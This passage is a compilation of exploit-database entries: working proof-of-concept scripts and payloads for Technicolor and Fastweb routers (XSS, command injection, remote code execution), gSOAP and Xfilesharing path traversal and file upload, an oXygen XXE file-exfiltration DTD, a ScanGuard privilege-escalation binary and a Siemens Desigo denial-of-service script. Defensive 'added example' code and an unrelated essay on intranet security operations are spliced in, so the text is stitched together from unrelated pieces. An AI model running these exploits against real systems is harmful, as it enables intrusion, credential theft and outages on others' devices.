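    '10.0.0.7 - - [13/Nov/2019:10:02:41 +0000] '
    '"GET /card_scan_decoder.php?No=30&door=%60id%20%3E%20test.txt%60 HTTP/1.1" '
    '200 12 "-" "python-requests/2.22.0"',
]

if __name__ == '__main__':
    for ip, finding, detail in scan(SAMPLE_LOG):
        print('%s %s %s' % (ip, finding, detail))
```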
            
# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: Luis Stefan
# Vendor Homepage: https://www.technicolor.com/
# Software Link: N/A
# Version: TC7300.B0 - STFA.51.20
# Tested on: macOS Mojave and Catalina
# CVE : 

#!/usr/bin/env python3
__author__ = "Luis Stefan"
__license__ = "MIT"
__version__ = "1.0"
__email__ = "luis.ss@protonmail.com"
__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""

from enum import IntEnum
from scapy.all import *
import codecs, sys, threading, time

# Define your network interface
interface = 'en0'
# Insert your interface card mac address
mac = 'xx:xx:xx:xx:xx:xx'
broadcast = 'ff:ff:ff:ff:ff:ff'
mac_hxd = codecs.decode(mac.replace(':', ''),'hex')

class Bootp(IntEnum):
    Discover = 1
    Offer = 2
    Request = 3
    Decline = 4
    Ack = 5
    Nak = 6
    Release = 7

def dhcp_discover():
    disc_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'discover'), 'end'])
    sendp(disc_pkt, iface=interface)

def dhcp_request(pkt):
    yraddr = pkt['BOOTP'].yraddr
    # gwaddr == Gateway Ip Address
    gwaddr = '192.168.0.1'
    param_req_list = []
    hostname = "<script>alert('XSS triggered')</script>"
    req_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
                      ('requested_addr', yraddr), ('hostname', hostname), 'end'])
    sendp(req_pkt, iface=interface)

def dhcp(pkt):
    print(pkt.display())
    print("#############################################################")
    if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
        dhcp_request(pkt)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
        print("Server Acknowledged")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
        print("Server Declined")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
        print("Server Nak")
        sys.exit(0)


def ver_dhcp():
    print("Verifying DHCP port traffic..")
    sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
    sys.exit(0)


def main():
    t1 = threading.Thread(target=ver_dhcp, args=())
    t1.start()
    time.sleep(2)
    dhcp_discover()
    t1.join()  # wait for the sniffer to see the OFFER/ACK (or time out)


if __name__ == "__main__":
    main()
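Added example, not from the advisory or the vendor: what a device should do with the DHCP hostname option (option 12) before placing it in its web UI, the control whose absence the script above demonstrates. Hostnames are validated as RFC 1123 labels, anything else is replaced by a MAC-derived placeholder, and the rendered row is HTML-escaped regardless; all inputs below are constructed.

```python
import html
import re

# RFC 1123 label: letters, digits, hyphens, 1-63 chars, no leading/trailing hyphen
LABEL_RE = re.compile(r'^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$')


def is_valid_hostname(name):
    """Accept only dotted RFC 1123 labels, 253 characters at most."""
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.split('.'))


def display_name_for_lease(option12, mac):
    """Return the name to store for a lease.

    option12 is the raw option value from the DHCPREQUEST; mac is the client
    hardware address as text. Invalid names never reach storage: a placeholder
    derived from the MAC is used instead."""
    try:
        candidate = option12.decode('ascii')
    except UnicodeDecodeError:
        candidate = ''
    if is_valid_hostname(candidate):
        return candidate
    return 'host-' + mac.replace(':', '')[-6:]


def render_lease_row(name, ip, mac):
    """Second layer: escape on output even for names that passed validation."""
    return '<tr><td>{}</td><td>{}</td><td>{}</td></tr>'.format(
        html.escape(name, quote=True), html.escape(ip), html.escape(mac))


# Constructed inputs: the PoC's payload hostname and a benign one
PAYLOAD = b"<script>alert('XSS triggered')</script>"
BENIGN = b"laptop-01"
MAC = "aa:bb:cc:dd:ee:ff"

if __name__ == '__main__':
    for raw in (PAYLOAD, BENIGN):
        name = display_name_for_lease(raw, MAC)
        print(render_lease_row(name, '192.168.0.10', MAC))
```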
            
# Exploit Title: Technicolor TD5130.2 - Remote Command Execution
# Date: 2019-11-12
# Exploit Author: João Teles
# Vendor Homepage: https://www.technicolor.com/
# Version: TD5130v2
# Firmware Version: OI_Fw_V20
# CVE : CVE-2019-18396

---------------------------

POST /mnt_ping.cgi HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOST/mnt_ping.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Cookie: session=COOKIE
Connection: close
Upgrade-Insecure-Requests: 1

isSubmit=1&addrType=3&pingAddr=;ls&send=Send
            
# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Riccardo Gasparini
# Vendor Homepage: https://www.fastweb.it/
# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
# Version: 0.00.81
# Tested on: Linux
# CVE : N/A

import requests, json, time, sys

current_milli_time = lambda: int(round(time.time() * 1000))

password='XXXXXXXXXXXXXXX'

if password == 'XXXXXXXXXXXXXXX':
    print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
    sys.exit(-1)

#get XSRF-TOKEN
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
    'Referer': 'http://192.168.1.254/tr069',
}
params = ()
response = requests.get('http://192.168.1.254', headers=headers)

#login request and get sessionKey
xsrfToken=response.cookies['XSRF-TOKEN']
cookies = {
    'XSRF-TOKEN': xsrfToken,
}
headers = {
    'Pragma': 'no-cache',
    'X-XSRF-TOKEN': xsrfToken,
    'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
    'Accept': 'application/json, text/plain, */*',
    'Referer': 'http://192.168.1.254/tr069',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'keep-alive',
    'Cache-Control': 'no-cache',
}
params = (
    ('_', str(current_milli_time())),
    ('cmd', '3'),
    ('nvget', 'login_confirm'),
    ('password', password),
    ('remember_me', '1'),
    ('sessionKey', 'NULL'),
    ('username', 'admin'),
)

response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)

jsonResponse = json.loads(response.text)
sessionKey=jsonResponse["login_confirm"]["check_session"]

print("Executing command reboot\n")

#some commands as example are shown below in the mount parameter
params = (
    ('_', str(current_milli_time())),
    ('act','nvset'),
    ('service','usb_remove'),
    #Code execution
    #('mount','&ping -c 10 192.168.1.172&'),
    #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
    ('mount','&reboot&'),
    ('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(response.text)

#logout
params = (
    ('_', str(current_milli_time())),
    ('cmd', '5'),
    ('nvget', 'login_confirm'),
    ('sessionKey', sessionKey),
)

response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(json.dumps(json.loads(response.text), indent=2))
            
# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap


POC
---------

GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close

root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
            
# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
# Date: 2019-10-10
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://www.scanguard.com/
# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
# Version: 2020
# Tested on: Windows
# CVE : N/A
# Category: exploit


SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt

[+] Credits: hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec          
 

[Vendor]
https://www.scanguard.com


[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d

Complete Antivirus & Security Software


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-18895


[Affected Product Code Base]
ScanGuard Antivirus - latest


[Affected Component]
Permissions on installation directory


[Attack Type]
Local


[Impact Code execution]
true


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Attack Vectors]
Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.


[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available


[Security Issue]
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to
privilege escalation via a Trojan horse executable file.

The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group.
This can allow low integrity malware the ability to replace ScanGuard executables.


C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F 
                                      Everyone:(OI)(CI)(ID)F       
                                      NT SERVICE\TrustedInstaller:(ID)F 
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F 
                                      NT AUTHORITY\SYSTEM:(ID)F 


[Exploit/POC]

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"

/* ScanGuard EoP
   PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){

  if(!FileExists(DISABLED_TARGET)){
    rename(TARGET, DISABLED_TARGET);
    printf("[+] ScanGuard Antivirus EoP PoC\n");
    Sleep(300);
    printf("[+] Disabled ScanGuard.exe ...\n");
    Sleep(300);
  }else{
    PWNED=TRUE;
  }

  char fname[MAX_PATH];
  char newLoc[]=TARGET;

  DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
  if (size){
     if(!PWNED){
        printf("[+] Copying exploit to vuln dir...\n");
        Sleep(300);
        CopyFile(fname, newLoc, FALSE);
        printf("[+] Replaced legit ScanGuard...\n");
        Sleep(300);
        printf("[+] Done!\n");
        Sleep(300);
        MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
        Sleep(2000);
        exit(0);
     }else{
        if(FileExists("ScamGuard.lnk")){
          system("DEL /f ScamGuard.lnk");
        }
        printf("[+] ScamGuard PWNED!!!\n");
        printf("[+] By hyp3rlinx\n");
        system("pause");
     }
  }
  return 0;
}

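Added example (not hyp3rlinx's code): the audit a defender runs to catch this class of weakness, a parser for cacls/icacls-style ACL listings that flags entries granting broad principals write-capable rights on a program directory. The sample input is the advisory's own listing re-used as constructed data; `audit_directory()` assumes `icacls` is available on the host.

```python
import re
import subprocess

# Principals that should never hold write-capable rights under Program Files
BROAD_PRINCIPALS = {
    'everyone', r'builtin\users',
    r'nt authority\authenticated users', r'nt authority\interactive',
}
# Rights (simple or specific) that let a caller replace or delete files:
# F full, M modify, W write, D delete, WD write data, AD append data,
# DC delete child, DE delete, WDAC write DACL, WO write owner, GW/GA generic
WRITE_RIGHTS = {'F', 'M', 'W', 'D', 'WD', 'AD', 'DC', 'DE', 'WDAC', 'WO', 'GW', 'GA'}

# One ACE as cacls/icacls print it: PRINCIPAL:(inheritance flags)PERMISSION
ACE_RE = re.compile(
    r'(?P<principal>(?:(?:NT AUTHORITY|NT SERVICE|BUILTIN|[A-Za-z0-9_.-]+)\\)?'
    r'[A-Za-z0-9_.$-][A-Za-z0-9 _.$-]*):'
    r'(?P<inherit>(?:\((?:OI|CI|IO|NP|I|ID)\))*)'
    r'(?P<perm>\([^)]*\)|[A-Z]+)\s*$'
)


def parse_acl_listing(text):
    """Yield (path, principal, inherit_flags, perm) for each ACE.
    The first ACE shares its line with the path; later ACEs are indented."""
    path = None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        prefix = line[:m.start()].strip()
        if prefix:
            path = prefix
        yield path, m.group('principal'), m.group('inherit'), m.group('perm')


def write_capable(perm):
    """True if a permission string such as F, (M), (RX) or (WD,AD) grants write."""
    tokens = {t.strip() for t in perm.strip('()').split(',')}
    return bool(tokens & WRITE_RIGHTS)


def find_weak_aces(text):
    """ACEs that hand broad, low-privilege principals write rights."""
    return [(path, principal, perm)
            for path, principal, _, perm in parse_acl_listing(text)
            if principal.lower() in BROAD_PRINCIPALS and write_capable(perm)]


def audit_directory(path):
    """Run icacls on a live Windows host and return its weak ACEs (assumes icacls on PATH)."""
    out = subprocess.run(['icacls', path], capture_output=True, text=True, check=False).stdout
    return find_weak_aces(out)


# The advisory's listing, re-used here as constructed input
SAMPLE_LISTING = r"""
C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F
"""

if __name__ == '__main__':
    for path, principal, perm in find_weak_aces(SAMPLE_LISTING):
        print('WEAK: %s grants %s to %s' % (path, perm, principal))
```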

[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952

#####################
Arbitrary File Upload
#####################

<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
    <input type="text" name="sid" value="joe">
    <input type="file" name="file">
    <input type="submit" value="Upload" name="submit">
</form>

Shell : http://xyz.com/cgi-bin/temp/joe/shell.php

####################
Local File Inclusion
####################

http://xyz.com/?op=page&tmpl=../../admin_settings

This URL fetches the "admin_settings.html" template without any authentication. The ".html" extension is hard-coded on the server, so the included file must have an .html extension, but it can sit anywhere on the server. The LFI can even be chained with the arbitrary file upload vulnerability by uploading an HTML file, e.g. "upload.html", and changing "sid" to "../../../../../../tmp" so that the file is uploaded into the server's tmp directory. The file can then be included as follows.

http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload

The Xfilesharing script also has built-in shortcodes, so RCE can be achieved by including them in that "upload.html" file.

Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
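Added example (not gSOAP's or Xfilesharing's code): the containment check both products lacked. `resolve_under_root()` canonicalises the joined path and refuses anything outside the root, covering the gSOAP `GET /../../../../etc/passwd` request and the Xfilesharing `tmpl=../../admin_settings` include (where the server appends a hard-coded `.html`). The web root is created in a temporary directory so the demo runs offline.

```python
import os
import tempfile


class TraversalError(ValueError):
    """Raised when a request would resolve outside the permitted root."""


def resolve_under_root(root, requested, suffix=''):
    """Map `requested` (a URL path or template name) onto `root` and return the
    canonical filesystem path, or raise TraversalError if it escapes `root`.
    `suffix` mimics servers that append a fixed extension, as Xfilesharing
    appends '.html' to the tmpl parameter."""
    root_real = os.path.realpath(root)
    relative = requested.lstrip('/\\') + suffix
    candidate = os.path.realpath(os.path.join(root_real, relative))
    # realpath() has collapsed every '..' and symlink, so a prefix test is now
    # meaningful; root + os.sep avoids matching a sibling such as root2.
    if candidate != root_real and not candidate.startswith(root_real + os.sep):
        raise TraversalError('request %r resolves outside %r' % (requested, root_real))
    return candidate


def read_template(templates_dir, name):
    """What an op=page&tmpl=<name> handler should do: check first, then read."""
    with open(resolve_under_root(templates_dir, name, suffix='.html'), 'rb') as fh:
        return fh.read()


def demo():
    """Build a throwaway web root with one template and replay the requests
    from both advisories against the check. Returns (served_bytes, rejected)."""
    with tempfile.TemporaryDirectory() as base:
        webroot = os.path.join(base, 'www')
        templates = os.path.join(webroot, 'templates')
        os.makedirs(templates)
        with open(os.path.join(templates, 'index.html'), 'wb') as fh:
            fh.write(b'<h1>index</h1>')
        served = read_template(templates, 'index')
        checks = [
            (webroot, '/../../../../../../../../../etc/passwd', ''),   # gSOAP request line
            (templates, '../../admin_settings', '.html'),              # Xfilesharing tmpl LFI
            (templates, '../../../../../../../tmp/upload', '.html'),   # upload + LFI chain
        ]
        rejected = []
        for root, req, suffix in checks:
            try:
                resolve_under_root(root, req, suffix)
            except TraversalError:
                rejected.append(req)
        return served, rejected


if __name__ == '__main__':
    served, rejected = demo()
    print('served %d bytes; rejected %d traversal attempts' % (len(served), len(rejected)))
```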
            
# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000
1.1- Poc.xml:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2- payload.dtd:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;

2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9
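Added example (not oXygen's code): the parser configuration a developer applies so that a document like Poc.xml above can neither fetch payload.dtd nor read win.ini. It drives the stdlib expat parser directly, refuses any DOCTYPE, and never resolves external entities; the documents below are constructed, the first reproducing the PoC's Poc.xml.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised for any document that tries to use a DTD or an external entity."""


def parse_untrusted(data):
    """Parse `data` (str or bytes) into a dict tree {tag, attrs, text, children}.
    A DOCTYPE of any kind is refused, so neither the internal-subset entities
    nor the external payload.dtd of the PoC are ever declared or fetched."""
    parser = expat.ParserCreate()
    # Belt and braces: even if a DOCTYPE slipped through, never read %dtd;
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML('DOCTYPE refused (root %r, system id %r)' % (name, sysid))

    def reject_external(context, base, sysid, pubid):
        raise UnsafeXML('external entity %r refused' % sysid)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external

    root = {'tag': None, 'attrs': {}, 'text': '', 'children': []}
    stack = [root]

    def start(tag, attrs):
        node = {'tag': tag, 'attrs': attrs, 'text': '', 'children': []}
        stack[-1]['children'].append(node)
        stack.append(node)

    def end(tag):
        stack.pop()

    def chars(text):
        stack[-1]['text'] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML('malformed XML: %s' % exc)
    return root['children'][0]


def rejects(data):
    """True when parse_untrusted() refuses the document."""
    try:
        parse_untrusted(data)
    except UnsafeXML:
        return True
    return False


# Constructed from the PoC above: the content of Poc.xml
POC_XML = """<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\\Windows\\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>"""

# A harmless document with no DTD, which must still parse
BENIGN_XML = '<config><host name="printer">10.0.0.9</host></config>'

if __name__ == '__main__':
    print('PoC rejected:', rejects(POC_XML))
    print('benign root:', parse_untrusted(BENIGN_XML)['tag'])
```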
            
# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
# Author: LiquidWorm
# Date: 2019-11-14
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version: 6.00
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
#                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC00-U, PXC64-U, PXC128-U
#                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
#                   With activated web server
#                   All firmware versions < V6.00.320
# CVE: N/A
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php

#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html

#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#

#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#


echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"
if [ "$#" -ne 1 ]; then
	echo -ne "\nUsage: $0 [ipaddr]\n\n"
	exit
fi
IP=$1
TARGET="http://$IP/"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$status" == "404" ]; then
	echo -ne "\n[*] Exploit successful!\n"
else
	echo -ne "\n[-] Exploit unsuccessful.\n"
	exit
fi
            

Intranet Security Operations

Intranet security operations cover a company's internal production and office networks. In traditional enterprises the production network generally means the industrial control network, while the office network means the enterprise's internal systems (document servers, OA systems, finance, patents, HR and other business systems) together with the employees' office computers. For an Internet or IT enterprise, the production network generally serves only the outside world (official website, main site, CDN, etc.), the office network is the same as in a traditional enterprise, and the test network is the network used for development and test environments. Internet and IT enterprises are advised to keep these three networks separated.

Production Network Security Operations

For the production network the operational strategy is similar to that of the office intranet, but the business reasoning differs. First, the production network is the enterprise's lifeline; as with the office network of a financial institution, the business cannot simply be taken offline. The first consideration is therefore business availability and the integrity of business data, and a dual-copy or multi-node system is recommended. For a discovered vulnerability, priority goes to patching the backup node that is not yet serving traffic; once the repair succeeds, the main and backup nodes are swapped, and the original main node, now the backup, is repaired in turn. Furthermore, the production network must be the most stable one: only the ports the business requires may be opened to the outside, and access to the production network from the office network must pass through a bastion host so that full authentication and auditing are achieved.

Office Intranet Security Operations

For the office intranet a high-defense zone must be established. Key sensitive systems such as AD, DHCP, DNS, OA, email, ERP, CRM, patents, finance, recruitment, legal affairs, investment, document management, IM communication, wiki, project management and version control must be placed in this zone. Collect their logs completely, ensure auditing and early-warning monitoring, and focus protection on these systems; they open to the outside only the ports the business requires. The gateway network segment (maintenance network) must have its access permissions configured separately and be logically isolated from the rest of the intranet. Ordinary employee hosts must run a unified HIDS product (an endpoint "guard" or "manager" style suite), and it is best to operate the control nodes of that HIDS on the intranet.

Test Network Security Operations

In general it is not recommended to impose strict security policy restrictions on the test network, but the access rights and access methods to the test network (via a bastion host) must be strictly limited to achieve whitelist control, and test services must not be connected to the office network or the production network.

Initial Focus of Security Operations

Vulnerability and Incident Handling

The two items above essentially reduce to a syllogism: discovery, disposal and improvement.

# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path
# Date: 2019-11-14
# Exploit Author: D.Goedecke
# Vendor Homepage: www.shrew.net
# Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe
# Version: 2.2.2
# Tested on: Windows 10 64bit


C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
ShrewSoft IKE Daemon iked                                        C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto
ShrewSoft IPSEC Daemon ipsecd                                    C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto 


C:\Users\user>sc qc iked
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: iked
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ShrewSoft IKE Daemon
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\user>sc qc ipsecd
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ipsecd
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ShrewSoft IPSEC Daemon
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem 



#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.
            
# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-17
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.70 Build 8595
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

